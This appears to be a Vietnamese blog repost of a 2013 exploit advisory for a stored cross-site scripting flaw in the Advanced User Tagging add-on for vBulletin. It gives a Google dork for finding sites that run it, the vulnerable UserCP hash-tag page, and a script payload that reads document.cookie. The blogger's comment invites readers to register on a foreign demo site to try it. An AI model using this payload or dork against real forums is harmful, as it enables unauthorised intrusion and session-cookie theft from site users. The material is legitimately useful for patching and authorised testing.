Đang tải dữ liệu...
01:12

vBulletin Advanced User Tagging Cross Site Scripting

vBulletin Advanced User Tagging Cross Site Scripting

# Exploit Title: Advanced User Tagging vBulletin -- Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
# Version: vBulletin 3.8.x, vBulletin 4.x.x
# Tested on: Linux & Windows
#
################################################################################​##########
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
# Direct Link: http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# Example: "><script>alert(document.cookie)</script>
#
################################################################################​##########
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility.
# Intended for authorized web application pentesting only!
Demo:
p/s: đăng ký 1 acc để test nhé
(vì việt nam ít admin xài cái này nên chỉ có demo nước ngoài thôi )

0 nhận xét

Leave a reply

Like Me On Facebook

Bài Đăng Mới

Quảng Cáo